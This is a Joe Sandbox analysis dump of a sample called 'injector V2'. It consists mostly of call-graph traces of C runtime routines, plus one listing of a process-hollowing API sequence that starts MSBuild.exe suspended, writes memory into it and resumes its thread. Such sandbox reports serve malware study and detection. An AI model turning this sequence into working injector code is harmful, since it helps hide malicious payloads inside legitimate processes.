17116->17117 17118 b54180 17117->17118 17120 b4eb9b __strnicoll 15 API calls 17117->17120 17123 b54136 __alloca_probe_16 17117->17123 17119 b4ec23 __freea 14 API calls 17118->17119 17121 b54186 17119->17121 17120->17123 17122 b4ec23 __freea 14 API calls 17121->17122 17122->17111 17123->17118 17124 b4ed44 __strnicoll MultiByteToWideChar 17123->17124 17125 b54179 17124->17125 17125->17118 17126 b541a2 17125->17126 17132 b4c625 17126->17132 17129 b4ec23 __freea 14 API calls 17130 b541c2 17129->17130 17131 b4ec23 __freea 14 API calls 17130->17131 17131->17111 17133 b4ca04 __strnicoll 5 API calls 17132->17133 17134 b4c630 17133->17134 17135 b4c829 __strnicoll 5 API calls 17134->17135 17136 b4c636 17134->17136 17137 b4c676 CompareStringW 17135->17137 17136->17129 17137->17136 17139 b533b3 17138->17139 17140 b533c8 HeapSize 17138->17140 17141 b4e41c __strnicoll 14 API calls 17139->17141 17140->17003 17142 b533b8 17141->17142 17143 b4b739 __strnicoll 39 API calls 17142->17143 17144 b533c3 17143->17144 17144->17003 17146 b533f3 17145->17146 17147 b533e8 17145->17147 17148 b533fb 17146->17148 17155 b53404 __dosmaperr 17146->17155 17149 b4eb9b __strnicoll 15 API calls 17147->17149 17150 b4dc4b ___free_lconv_mon 14 API calls 17148->17150 17153 b533f0 17149->17153 17150->17153 17151 b5342e HeapReAlloc 17151->17153 17151->17155 17152 b53409 17154 b4e41c __strnicoll 14 API calls 17152->17154 17153->17007 17154->17153 17155->17151 17155->17152 17156 b4abd8 __dosmaperr 2 API calls 17155->17156 17156->17155 17158 b4d448 __strnicoll 39 API calls 17157->17158 17159 b4f1dc 17158->17159 17160 b4f1ee 17159->17160 17165 b4c606 17159->17165 17162 b4f262 17160->17162 17171 b4f438 17162->17171 17168 b4c9ea 17165->17168 17169 b4c965 __dosmaperr 5 API calls 17168->17169 17170 b4c60e 17169->17170 17170->17160 17172 b4f446 17171->17172 17173 b4f460 17171->17173 17189 b4f248 17172->17189 17175 b4f486 17173->17175 17176 b4f467 17173->17176 17177 b4ed44 __strnicoll MultiByteToWideChar 17175->17177 17178 b4f27a 17176->17178 17193 b4f209 17176->17193 17183 b4f495 17177->17183 17178->17013 17178->17015 17180 b4f49c GetLastError 17198 b4e442 17180->17198 17182 b4f4c2 17182->17178 17186 b4ed44 __strnicoll MultiByteToWideChar 17182->17186 17183->17180 17183->17182 17185 b4f209 15 API calls 17183->17185 17185->17182 17188 b4f4d9 17186->17188 17187 b4e41c __strnicoll 14 API calls 17187->17178 17188->17178 17188->17180 17190 b4f25b 17189->17190 17191 b4f253 17189->17191 17190->17178 17192 b4dc4b ___free_lconv_mon 14 API calls 17191->17192 17192->17190 17194 b4f248 14 API calls 17193->17194 17195 b4f217 17194->17195 17203 b4f1ab 17195->17203 17206 b4e42f 17198->17206 17200 b4e44d __dosmaperr 17201 b4e41c __strnicoll 14 API calls 17200->17201 17202 b4e460 17201->17202 17202->17187 17204 b4eb9b __strnicoll 15 API calls 17203->17204 17205 b4f1b8 17204->17205 17205->17178 17207 b4ccdb __dosmaperr 14 API calls 17206->17207 17208 b4e434 17207->17208 17208->17200 17210 b4aa2f 17209->17210 17211 b4aa1e 17209->17211 17225 b4ab8b 17210->17225 17212 b4965c __FrameHandler3::FrameUnwindToState GetModuleHandleW 17211->17212 17214 b4aa23 17212->17214 17214->17210 17220 b4a925 GetModuleHandleExW 17214->17220 17216 b4a8dd 17216->16342 17221 b4a964 GetProcAddress 17220->17221 17222 b4a978 17220->17222 17221->17222 17223 b4a994 17222->17223 17224 b4a98b FreeLibrary 17222->17224 17223->17210 17224->17223 17226 b4ab97 ___scrt_is_nonwritable_in_current_image 17225->17226 17240 b4cae1 EnterCriticalSection 17226->17240 17228 b4aba1 17241 b4aa88 17228->17241 17230 b4abae 17245 b4abcc 17230->17245 17233 b4a9c0 17270 b4a9a7 17233->17270 17235 b4a9ca 17236 b4a9de 17235->17236 17237 b4a9ce GetCurrentProcess TerminateProcess 17235->17237 17238 b4a925 __FrameHandler3::FrameUnwindToState 3 API calls 17236->17238 17237->17236 17239 b4a9e6 ExitProcess 17238->17239 17240->17228 17243 b4aa94 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState 17241->17243 17242 b4aaf8 __FrameHandler3::FrameUnwindToState 17242->17230 17243->17242 17248 b4b13b 17243->17248 17269 b4caf8 LeaveCriticalSection 17245->17269 17247 b4aa67 17247->17216 17247->17233 17249 b4b147 __EH_prolog3 17248->17249 17252 b4b3c6 17249->17252 17251 b4b16e __FrameHandler3::FrameUnwindToState 17251->17242 17253 b4b3d2 ___scrt_is_nonwritable_in_current_image 17252->17253 17260 b4cae1 EnterCriticalSection 17253->17260 17255 b4b3e0 17261 b4b291 17255->17261 17260->17255 17262 b4b2a8 17261->17262 17263 b4b2b0 17261->17263 17265 b4b415 17262->17265 17263->17262 17264 b4dc4b ___free_lconv_mon 14 API calls 17263->17264 17264->17262 17268 b4caf8 LeaveCriticalSection 17265->17268 17267 b4b3fe 17267->17251 17268->17267 17269->17247 17273 b4e4f1 17270->17273 17272 b4a9ac __FrameHandler3::FrameUnwindToState 17272->17235 17274 b4e500 __FrameHandler3::FrameUnwindToState 17273->17274 17275 b4e50d 17274->17275 17277 b4c85a 17274->17277 17275->17272 17278 b4c965 __dosmaperr 5 API calls 17277->17278 17279 b4c876 17278->17279 17279->17275 17281 b4a78d 17280->17281 17282 b4a79f ___scrt_uninitialize_crt 17280->17282 17283 b4a79b 17281->17283 17285 b4e027 17281->17285 17282->16380 17283->16380 17288 b4e152 17285->17288 17291 b4e22b 17288->17291 17292 b4e237 ___scrt_is_nonwritable_in_current_image 17291->17292 17299 b4cae1 EnterCriticalSection 17292->17299 17294 b4e2ad 17308 b4e2cb 17294->17308 17298 b4e241 ___scrt_uninitialize_crt 17298->17294 17300 b4e19f 17298->17300 17299->17298 17301 b4e1ab ___scrt_is_nonwritable_in_current_image 17300->17301 17311 b4e2d7 EnterCriticalSection 17301->17311 17303 b4e1ee 17325 b4e21f 17303->17325 17304 b4e1b5 ___scrt_uninitialize_crt 17304->17303 17312 b4e030 17304->17312 17424 b4caf8 LeaveCriticalSection 17308->17424 17310 b4e02e 17310->17283 17311->17304 17313 b4e045 __strnicoll 17312->17313 17314 b4e057 17313->17314 17315 b4e04c 17313->17315 17328 b4e095 17314->17328 17317 b4e152 ___scrt_uninitialize_crt 68 API calls 17315->17317 17319 b4e052 17317->17319 17320 b4b9a7 __strnicoll 39 API calls 17319->17320 17322 b4e08f 17320->17322 17322->17303 17323 b4e078 17341 b5108f 17323->17341 17423 b4e2eb LeaveCriticalSection 17325->17423 17327 b4e20d 17327->17298 17329 b4e061 17328->17329 17330 b4e0ae 17328->17330 17329->17319 17334 b511ae 17329->17334 17330->17329 17331 b511ae ___scrt_uninitialize_crt 39 API calls 17330->17331 17332 b4e0ca 17331->17332 17352 b513f1 17332->17352 17335 b511cf 17334->17335 17336 b511ba 17334->17336 17335->17323 17337 b4e41c __strnicoll 14 API calls 17336->17337 17338 b511bf 17337->17338 17339 b4b739 __strnicoll 39 API calls 17338->17339 17340 b511ca 17339->17340 17340->17323 17342 b510a0 17341->17342 17343 b510ad 17341->17343 17344 b4e41c __strnicoll 14 API calls 17342->17344 17345 b510f6 17343->17345 17348 b510d4 17343->17348 17350 b510a5 17344->17350 17346 b4e41c __strnicoll 14 API calls 17345->17346 17347 b510fb 17346->17347 17349 b4b739 __strnicoll 39 API calls 17347->17349 17393 b5110c 17348->17393 17349->17350 17350->17319 17353 b513fd ___scrt_is_nonwritable_in_current_image 17352->17353 17354 b5143e 17353->17354 17356 b51484 17353->17356 17362 b51405 17353->17362 17355 b4b8e2 __strnicoll 29 API calls 17354->17355 17355->17362 17363 b508b4 EnterCriticalSection 17356->17363 17358 b5148a 17359 b514a8 17358->17359 17364 b511d5 17358->17364 17390 b514fa 17359->17390 17362->17329 17363->17358 17365 b511fd 17364->17365 17388 b51220 ___scrt_uninitialize_crt 17364->17388 17366 b51201 17365->17366 17368 b5125c 17365->17368 17367 b4b8e2 __strnicoll 29 API calls 17366->17367 17367->17388 17369 b5127a 17368->17369 17370 b539ac ___scrt_uninitialize_crt 41 API calls 17368->17370 17371 b51502 ___scrt_uninitialize_crt 40 API calls 17369->17371 17370->17369 17372 b5128c 17371->17372 17373 b51292 17372->17373 17374 b512d9 17372->17374 17377 b512c1 17373->17377 17378 b5129a 17373->17378 17375 b51342 WriteFile 17374->17375 17376 b512ed 17374->17376 17379 b51364 GetLastError 17375->17379 17375->17388 17381 b512f5 17376->17381 17382 b5132e 17376->17382 17380 b5157f ___scrt_uninitialize_crt 45 API calls 17377->17380 17386 b51946 ___scrt_uninitialize_crt 6 API calls 17378->17386 17378->17388 17379->17388 17380->17388 17384 b5131a 17381->17384 17385 b512fa 17381->17385 17383 b519ae ___scrt_uninitialize_crt 7 API calls 17382->17383 17383->17388 17387 b51b72 ___scrt_uninitialize_crt 8 API calls 17384->17387 17385->17388 17389 b51a89 ___scrt_uninitialize_crt 7 API calls 17385->17389 17386->17388 17387->17388 17388->17359 17389->17388 17391 b508d7 ___scrt_uninitialize_crt LeaveCriticalSection 17390->17391 17392 b51500 17391->17392 17392->17362 17394 b51118 ___scrt_is_nonwritable_in_current_image 17393->17394 17406 b508b4 EnterCriticalSection 17394->17406 17396 b51127 17397 b5116c 17396->17397 17407 b5066b 17396->17407 17399 b4e41c __strnicoll 14 API calls 17397->17399 17401 b51173 17399->17401 17400 b51153 FlushFileBuffers 17400->17401 17402 b5115f GetLastError 17400->17402 17420 b511a2 17401->17420 17403 b4e42f __dosmaperr 14 API calls 17402->17403 17403->17397 17406->17396 17408 b5068d 17407->17408 17409 b50678 17407->17409 17412 b4e42f __dosmaperr 14 API calls 17408->17412 17414 b506b2 17408->17414 17410 b4e42f __dosmaperr 14 API calls 17409->17410 17411 b5067d 17410->17411 17413 b4e41c __strnicoll 14 API calls 17411->17413 17415 b506bd 17412->17415 17416 b50685 17413->17416 17414->17400 17417 b4e41c __strnicoll 14 API calls 17415->17417 17416->17400 17418 b506c5 17417->17418 17419 b4b739 __strnicoll 39 API calls 17418->17419 17419->17416 17421 b508d7 ___scrt_uninitialize_crt LeaveCriticalSection 17420->17421 17422 b5118b 17421->17422 17422->17350 17423->17327 17424->17310 16084 b4bc74 16087 b4dc4b 16084->16087 16088 b4dc56 RtlFreeHeap 16087->16088 16089 b4bc8c 16087->16089 16088->16089 16090 b4dc6b GetLastError 16088->16090 16091 b4dc78 __dosmaperr 16090->16091 16093 b4e41c 16091->16093 16096 b4ccdb GetLastError 16093->16096 16095 b4e421 16095->16089 16097 b4ccf1 16096->16097 16101 b4ccf7 16096->16101 16119 b4c700 16097->16119 16117 b4ccfb SetLastError 16101->16117 16124 b4c73f 16101->16124 16105 b4cd30 16107 b4c73f __dosmaperr 6 API calls 16105->16107 16106 b4cd41 16108 b4c73f __dosmaperr 6 API calls 16106->16108 16109 b4cd3e 16107->16109 16110 b4cd4d 16108->16110 16114 b4dc4b ___free_lconv_mon 12 API calls 16109->16114 16111 b4cd51 16110->16111 16112 b4cd68 16110->16112 16113 b4c73f __dosmaperr 6 API calls 16111->16113 16136 b4ce9c 16112->16136 16113->16109 16114->16117 16117->16095 16118 b4dc4b ___free_lconv_mon 12 API calls 16118->16117 16141 b4c965 16119->16141 16122 b4c737 TlsGetValue 16123 b4c725 16123->16101 16125 b4c965 __dosmaperr 5 API calls 16124->16125 16126 b4c75b 16125->16126 16127 b4c764 16126->16127 16128 b4c779 TlsSetValue 16126->16128 16127->16117 16129 b4eb3e 16127->16129 16134 b4eb4b __dosmaperr 16129->16134 16130 b4eb8b 16133 b4e41c __strnicoll 13 API calls 16130->16133 16131 b4eb76 HeapAlloc 16132 b4cd28 16131->16132 16131->16134 16132->16105 16132->16106 16133->16132 16134->16130 16134->16131 16156 b4abd8 16134->16156 16170 b4d002 16136->16170 16142 b4c995 16141->16142 16147 b4c71c 16141->16147 16142->16147 16148 b4c89a 16142->16148 16145 b4c9af GetProcAddress 16146 b4c9bf __dosmaperr 16145->16146 16145->16147 16146->16147 16147->16122 16147->16123 16153 b4c8ab ___vcrt_FlsFree 16148->16153 16149 b4c941 16149->16145 16149->16147 16150 b4c8c9 LoadLibraryExW 16151 b4c8e4 GetLastError 16150->16151 16152 b4c948 16150->16152 16151->16153 16152->16149 16154 b4c95a FreeLibrary 16152->16154 16153->16149 16153->16150 16155 b4c917 LoadLibraryExW 16153->16155 16154->16149 16155->16152 16155->16153 16159 b4ac13 16156->16159 16160 b4ac1f ___scrt_is_nonwritable_in_current_image 16159->16160 16165 b4cae1 EnterCriticalSection 16160->16165 16162 b4ac2a __FrameHandler3::FrameUnwindToState 16166 b4ac61 16162->16166 16165->16162 16169 b4caf8 LeaveCriticalSection 16166->16169 16168 b4abe3 16168->16134 16169->16168 16171 b4d00e ___scrt_is_nonwritable_in_current_image 16170->16171 16184 b4cae1 EnterCriticalSection 16171->16184 16173 b4d018 16185 b4d048 16173->16185 16176 b4d054 16177 b4d060 ___scrt_is_nonwritable_in_current_image 16176->16177 16189 b4cae1 EnterCriticalSection 16177->16189 16179 b4d06a 16190 b4ce51 16179->16190 16181 b4d082 16194 b4d0a2 16181->16194 16184->16173 16188 b4caf8 LeaveCriticalSection 16185->16188 16187 b4cf0a 16187->16176 16188->16187 16189->16179 16191 b4ce87 __dosmaperr 16190->16191 16192 b4ce60 __dosmaperr 16190->16192 16191->16181 16192->16191 16197 b4ef04 16192->16197 16311 b4caf8 LeaveCriticalSection 16194->16311 16196 b4cd73 16196->16118 16199 b4ef84 16197->16199 16200 b4ef1a 16197->16200 16202 b4dc4b ___free_lconv_mon 14 API calls 16199->16202 16224 b4efd2 16199->16224 16200->16199 16206 b4dc4b ___free_lconv_mon 14 API calls 16200->16206 16207 b4ef4d 16200->16207 16201 b4efe0 16212 b4f040 16201->16212 16221 b4dc4b 14 API calls ___free_lconv_mon 16201->16221 16203 b4efa6 16202->16203 16204 b4dc4b ___free_lconv_mon 14 API calls 16203->16204 16208 b4efb9 16204->16208 16205 b4dc4b ___free_lconv_mon 14 API calls 16211 b4ef79 16205->16211 16213 b4ef42 16206->16213 16209 b4dc4b ___free_lconv_mon 14 API calls 16207->16209 16223 b4ef6f 16207->16223 16210 b4dc4b ___free_lconv_mon 14 API calls 16208->16210 16214 b4ef64 16209->16214 16215 b4efc7 16210->16215 16216 b4dc4b ___free_lconv_mon 14 API calls 16211->16216 16217 b4dc4b ___free_lconv_mon 14 API calls 16212->16217 16225 b4e8ce 16213->16225 16253 b4e9cc 16214->16253 16220 b4dc4b ___free_lconv_mon 14 API calls 16215->16220 16216->16199 16222 b4f046 16217->16222 16220->16224 16221->16201 16222->16191 16223->16205 16265 b4f09e 16224->16265 16226 b4e8df 16225->16226 16227 b4e9c8 16225->16227 16228 b4e8f0 16226->16228 16230 b4dc4b ___free_lconv_mon 14 API calls 16226->16230 16227->16207 16229 b4e902 16228->16229 16231 b4dc4b ___free_lconv_mon 14 API calls 16228->16231 16232 b4e914 16229->16232 16233 b4dc4b ___free_lconv_mon 14 API calls 16229->16233 16230->16228 16231->16229 16234 b4e926 16232->16234 16235 b4dc4b ___free_lconv_mon 14 API calls 16232->16235 16233->16232 16236 b4e938 16234->16236 16238 b4dc4b ___free_lconv_mon 14 API calls 16234->16238 16235->16234 16237 b4e94a 16236->16237 16239 b4dc4b ___free_lconv_mon 14 API calls 16236->16239 16240 b4e95c 16237->16240 16241 b4dc4b ___free_lconv_mon 14 API calls 16237->16241 16238->16236 16239->16237 16242 b4e96e 16240->16242 16243 b4dc4b ___free_lconv_mon 14 API calls 16240->16243 16241->16240 16244 b4e980 16242->16244 16246 b4dc4b ___free_lconv_mon 14 API calls 16242->16246 16243->16242 16245 b4e992 16244->16245 16247 b4dc4b ___free_lconv_mon 14 API calls 16244->16247 16248 b4e9a4 16245->16248 16249 b4dc4b ___free_lconv_mon 14 API calls 16245->16249 16246->16244 16247->16245 16250 b4e9b6 16248->16250 16251 b4dc4b ___free_lconv_mon 14 API calls 16248->16251 16249->16248 16250->16227 16252 b4dc4b ___free_lconv_mon 14 API calls 16250->16252 16251->16250 16252->16227 16254 b4ea31 16253->16254 16255 b4e9d9 16253->16255 16254->16223 16256 b4e9e9 16255->16256 16257 b4dc4b ___free_lconv_mon 14 API calls 16255->16257 16258 b4e9fb 16256->16258 16259 b4dc4b ___free_lconv_mon 14 API calls 16256->16259 16257->16256 16260 b4ea0d 16258->16260 16262 b4dc4b ___free_lconv_mon 14 API calls 16258->16262 16259->16258 16261 b4ea1f 16260->16261 16263 b4dc4b ___free_lconv_mon 14 API calls 16260->16263 16261->16254 16264 b4dc4b ___free_lconv_mon 14 API calls 16261->16264 16262->16260 16263->16261 16264->16254 16266 b4f0ca 16265->16266 16267 b4f0ab 16265->16267 16266->16201 16267->16266 16271 b4ea35 16267->16271 16270 b4dc4b ___free_lconv_mon 14 API calls 16270->16266 16272 b4eb13 16271->16272 16273 b4ea46 16271->16273 16272->16270 16307 b4eb19 16273->16307 16276 b4eb19 __dosmaperr 14 API calls 16277 b4ea59 16276->16277 16278 b4eb19 __dosmaperr 14 API calls 16277->16278 16279 b4ea64 16278->16279 16280 b4eb19 __dosmaperr 14 API calls 16279->16280 16281 b4ea6f 16280->16281 16282 b4eb19 __dosmaperr 14 API calls 16281->16282 16283 b4ea7d 16282->16283 16284 b4dc4b ___free_lconv_mon 14 API calls 16283->16284 16285 b4ea88 16284->16285 16286 b4dc4b ___free_lconv_mon 14 API calls 16285->16286 16287 b4ea93 16286->16287 16288 b4dc4b ___free_lconv_mon 14 API calls 16287->16288 16289 b4ea9e 16288->16289 16290 b4eb19 __dosmaperr 14 API calls 16289->16290 16291 b4eaac 16290->16291 16292 b4eb19 __dosmaperr 14 API calls 16291->16292 16293 b4eaba 16292->16293 16294 b4eb19 __dosmaperr 14 API calls 16293->16294 16295 b4eacb 16294->16295 16296 b4eb19 __dosmaperr 14 API calls 16295->16296 16297 b4ead9 16296->16297 16298 b4eb19 __dosmaperr 14 API calls 16297->16298 16299 b4eae7 16298->16299 16300 b4dc4b ___free_lconv_mon 14 API calls 16299->16300 16301 b4eaf2 16300->16301 16302 b4dc4b ___free_lconv_mon 14 API calls 16301->16302 16303 b4eafd 16302->16303 16304 b4dc4b ___free_lconv_mon 14 API calls 16303->16304 16305 b4eb08 16304->16305 16306 b4dc4b ___free_lconv_mon 14 API calls 16305->16306 16306->16272 16308 b4eb2b 16307->16308 16309 b4ea4e 16308->16309 16310 b4dc4b ___free_lconv_mon 14 API calls 16308->16310 16309->16276 16310->16308 16311->16196 17425 b2d475 17426 b2dec8 17425->17426 17430 b2cd50 17425->17430 17427 b3017a 17426->17427 17426->17430 17428 b48dd1 TranslatorGuardHandler 5 API calls 17427->17428 17429 b30184 17428->17429 17431 b2ce30 GetPEB 17430->17431 17433 b29210 17430->17433 17431->17430 17434 b29660 17433->17434 17435 b48dd1 TranslatorGuardHandler 5 API calls 17434->17435 17436 b2a0a0 17435->17436 17436->17430 18525 b2da6c 18527 b2cd50 18525->18527 18526 b2ce30 GetPEB 18526->18527 18527->18526 18528 b29210 5 API calls 18527->18528 18528->18527

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00B5D0FF,00B5D0EF), ref: 00B5D323
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00B5D336
                                                                                                                            • Wow64GetThreadContext.KERNEL32(0000008C,00000000), ref: 00B5D354
                                                                                                                            • ReadProcessMemory.KERNELBASE(000000F8,?,00B5D143,00000004,00000000), ref: 00B5D378
                                                                                                                            • VirtualAllocEx.KERNELBASE(000000F8,?,?,00003000,00000040), ref: 00B5D3A3
                                                                                                                            • WriteProcessMemory.KERNELBASE(000000F8,00000000,?,?,00000000,?), ref: 00B5D3FB
                                                                                                                            • WriteProcessMemory.KERNELBASE(000000F8,00400000,?,?,00000000,?,00000028), ref: 00B5D446
                                                                                                                            • WriteProcessMemory.KERNELBASE(000000F8,?,?,00000004,00000000), ref: 00B5D484
                                                                                                                            • Wow64SetThreadContext.KERNEL32(0000008C,02DE0000), ref: 00B5D4C0
                                                                                                                            • ResumeThread.KERNELBASE(0000008C), ref: 00B5D4CF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                            • API String ID: 2687962208-3857624555
                                                                                                                            • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                            • Instruction ID: e150c4a12f20bb977068c66e3957c89d6fc74e7534b9f4564b61261a02f19c73
                                                                                                                            • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                            • Instruction Fuzzy Hash: AFB1F67660064AAFDB60CF68CC80BDA73A5FF88714F158564EA08AB341D770FA55CB94

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 272 b2d475-b2d47b 273 b2d481-b2d487 272->273 274 b2dec8-b2dece 272->274 277 b2e776-b2e77c 273->277 278 b2d48d-b2d493 273->278 275 b2ded4-b2deda 274->275 276 b3017a-b3018d call b48dd1 274->276 279 b2dee0-b2dee6 275->279 280 b2fc0e-b2fc53 275->280 282 b2e782-b2e788 277->282 283 b2f77e-b2f79a 277->283 284 b2f1a7-b2ffa7 278->284 285 b2d499-b2d49f 278->285 286 b2cd50-b2cd56 279->286 288 b2deec-b2df1a 279->288 294 b2cd58-b2cdb2 280->294 298 b2fc59 280->298 282->286 290 b2e78e-b2e7bc 282->290 283->280 284->294 295 b2ffad 284->295 285->286 287 b2d4a5-b2d4b0 285->287 286->294 297 b2cdd0-b2ce2a 286->297 293 b2d4b6 287->293 287->294 296 b2fe99-b2feb0 288->296 290->296 293->297 294->286 315 b2cdb4-b2cdbf 294->315 295->297 296->294 299 b2feb6 296->299 297->286 314 b2ce30-b2cec2 GetPEB call b23e60 call b25f10 * 2 call b29210 297->314 298->297 299->297 314->294 326 b2cec8 314->326 315->294 317 b2cdc1-b2cdcb 315->317 317->297 326->297
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: XvIL
                                                                                                                            • API String ID: 0-558896452
                                                                                                                            • Opcode ID: 77572fdbc8eccc2ef541cafc59767fa55151aa90f9e5607e640e1bb7846b38a9
                                                                                                                            • Instruction ID: ff3b19026de63191eaf8984a4d6bfdfe40020b1f7e5154132f911ad774da07ff
                                                                                                                            • Opcode Fuzzy Hash: 77572fdbc8eccc2ef541cafc59767fa55151aa90f9e5607e640e1bb7846b38a9
                                                                                                                            • Instruction Fuzzy Hash: DB61CB363112218B9E2C9A28B8E563C7BD1DF58361B3542FEF41F57AF4CA25AC4187C2

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 26 b50e88-b50ea1 27 b50eb7-b50ebc 26->27 28 b50ea3-b50eb3 call b53990 26->28 29 b50ebe-b50ec6 27->29 30 b50ec9-b50eef call b4ed44 27->30 28->27 34 b50eb5 28->34 29->30 36 b51065-b51076 call b48dd1 30->36 37 b50ef5-b50f00 30->37 34->27 39 b50f06-b50f0b 37->39 40 b51058 37->40 42 b50f24-b50f2f call b4eb9b 39->42 43 b50f0d-b50f16 call b52b70 39->43 44 b5105a 40->44 42->44 51 b50f35 42->51 43->44 52 b50f1c-b50f22 43->52 46 b5105c-b51063 call b4ec23 44->46 46->36 54 b50f3b-b50f40 51->54 52->54 54->44 55 b50f46-b50f5b call b4ed44 54->55 55->44 58 b50f61-b50f73 call b4c7cc 55->58 60 b50f78-b50f7c 58->60 60->44 61 b50f82-b50f8a 60->61 62 b50fc4-b50fd0 61->62 63 b50f8c-b50f91 61->63 64 b50fd2-b50fd4 62->64 65 b5104d 62->65 63->46 66 b50f97-b50f99 63->66 67 b50fd6-b50fdf call b52b70 64->67 68 b50fe9-b50ff4 call b4eb9b 64->68 69 b5104f-b51056 call b4ec23 65->69 66->44 70 b50f9f-b50fb9 call b4c7cc 66->70 67->69 79 b50fe1-b50fe7 67->79 68->69 80 b50ff6 68->80 69->44 70->46 81 b50fbf 70->81 82 b50ffc-b51001 79->82 80->82 81->44 82->69 83 b51003-b5101b call b4c7cc 82->83 83->69 86 b5101d-b51024 83->86 87 b51045-b5104b 86->87 88 b51026-b51027 86->88 89 b51028-b5103a call b5010e 87->89 88->89 89->69 92 b5103c-b51043 call b4ec23 89->92 92->46
                                                                                                                            APIs
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00B50F0D
                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00B50FD6
                                                                                                                            • __freea.LIBCMT ref: 00B5103D
                                                                                                                              • Part of subcall function 00B4EB9B: RtlAllocateHeap.NTDLL(00000000,00B276E8,?,?,00B276E8,01E84800), ref: 00B4EBCD
                                                                                                                            • __freea.LIBCMT ref: 00B51050
                                                                                                                            • __freea.LIBCMT ref: 00B5105D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1423051803-0
                                                                                                                            • Opcode ID: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
                                                                                                                            • Instruction ID: 1f6971281628d21f245d5bcfc780716d454275995275f21cbc0fd42626e7dee7
                                                                                                                            • Opcode Fuzzy Hash: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
                                                                                                                            • Instruction Fuzzy Hash: 3651E672600256AFDB206F68CC81FBB7BE9EF44712F1908E9FD04D6181EB74DD889660

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
